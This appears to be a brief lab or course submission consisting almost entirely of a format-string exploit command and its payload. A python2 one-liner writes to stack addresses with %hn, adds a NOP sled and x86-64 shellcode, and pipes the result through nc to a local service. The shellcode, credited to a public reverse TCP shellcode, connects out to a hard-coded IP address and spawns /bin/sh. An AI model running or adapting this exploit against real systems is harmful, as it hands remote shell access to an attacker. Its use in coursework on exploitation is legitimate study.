Part I Payload
Ryan Sowers
06/01/2018


Command line:

python2 -c 'print "%32767c%13$hn%27825c%15$hn%4943c%14$hn" + "AA" + "\x6c\xed\xff\xff\xff\x7f\x00\x00" + "\x6a\xed\xff\xff\xff\x7f\x00\x00" + "\x68\xed\xff\xff\xff\x7f\x00\x00" + "\x90"*64 + "\x68\xac\x10\x06\x6d\x66\x68\x11\x5d\x66\x6a\x02\x6a\x2a\x6a\x10\x6a\x29\x6a\x01\x6a\x02\x5f\x5e\x48\x31\xd2\x58\x0f\x05\x48\x89\xc7\x5a\x58\x48\x89\xe6\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05"' | nc localhost 4444


Actual payload: 

"\x68\xac\x10\x06\x6d\x66\x68\x11\x5d\x66\x6a\x02\x6a\x2a\x6a\x10\x6a\x29\x6a\x01\x6a\x02\x5f\x5e\x48\x31\xd2\x58\x0f\x05\x48\x89\xc7\x5a\x58\x48\x89\xe6\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05"


Derived from: 
 Title: Linux/x86-64 - Reverse TCP shellcode - 84 bytes
 Author: Manuel Mancera (@sinkmanu)
 See reverse_shell2.c